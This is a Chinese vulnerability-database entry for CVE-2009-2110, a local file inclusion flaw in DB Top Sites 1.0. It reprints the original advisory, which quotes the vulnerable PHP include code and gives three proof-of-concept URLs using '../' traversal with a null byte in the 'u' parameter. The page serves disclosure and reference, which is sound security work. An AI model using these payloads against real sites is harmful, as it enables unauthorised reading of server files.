jnmsolutions DB Top Sites 多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117970 漏洞类型 路径遍历
发布时间 2009-06-15 更新时间 2009-06-15
CVE编号 CVE-2009-2110 CNNVD-ID CNNVD-200906-298
漏洞平台 PHP CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/8952
https://www.securityfocus.com/bid/44114
https://cxsecurity.com/issue/WLB-2009060163
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-298
|漏洞详情
DBTopSites1.0版本中存在多个目录遍历漏洞,当magic_quotes_gpc被中止时,远程攻击者可以借助对(1)full.php,(2)index.php,以及(3)contact.php的u参数中的一个..,包含和允许任意本地文件。
|漏洞EXP
######################################################################
[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability
[+] Discovered By SirGod 
[+] www.mortal-team.org
#######################################################################

[+] Local File Inclusion

 - Vulnerable code is everywhere

-------------------------------------------------------------------------------------------------------
if ( $u != "" ) {

if ( file_exists( "./sites/session/$u.session.php" ) ){
include "./sites/session/$u.session.php";
include "./sites/$u.php";
-------------------------------------------------------------------------------------------------------

- PoC's

    http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00

    http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00


#######################################################################

# milw0rm.com [2009-06-15]
|受影响的产品
JNM Solutions DB Top Sites 1.0
|参考资料

来源:XF
名称:dbtopsites-index-file-include(51120)
链接:http://xforce.iss.net/xforce/xfdb/51120
来源:MILW0RM
名称:8952
链接:http://www.milw0rm.com/exploits/8952
来源:SECUNIA
名称:35419
链接:http://secunia.com/advisories/35419
来源:OSVDB
名称:55118
链接:http://osvdb.org/55118
来源:OSVDB
名称:55117
链接:http://osvdb.org/55117
来源:OSVDB
名称:55116
链接:http://osvdb.org/55116